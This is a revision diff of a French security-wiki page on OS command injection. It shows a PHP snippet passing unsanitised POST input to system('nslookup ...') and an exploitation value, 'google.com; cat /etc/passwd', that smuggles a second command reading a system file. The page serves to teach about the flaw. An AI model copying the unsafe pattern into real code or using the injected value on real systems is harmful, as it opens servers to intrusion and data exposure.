Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
failles_web:os_injection [2020/02/08 18:15] M0N5T3R |
failles_web:os_injection [2020/02/08 18:16] (Version actuelle) M0N5T3R |
||
---|---|---|---|
Ligne 2: | Ligne 2: | ||
<code> | <code> | ||
- | $_POST['host'] = 'google.com'; | + | //$_POST['host'] = 'google.com'; |
system('nslookup ' . $_POST['host']); | system('nslookup ' . $_POST['host']); | ||
</code> | </code> | ||
Ligne 8: | Ligne 8: | ||
- | Si on modifie les données envoyées en POST par quelque chose comme : | + | Exploitation de la faille : On modifie les données envoyées en POST par quelque chose comme : |
- | $_POST['host'] = 'google.com; cat /etc/passwd'; | + | <code>$_POST['host'] = 'google.com; cat /etc/passwd'; </code> |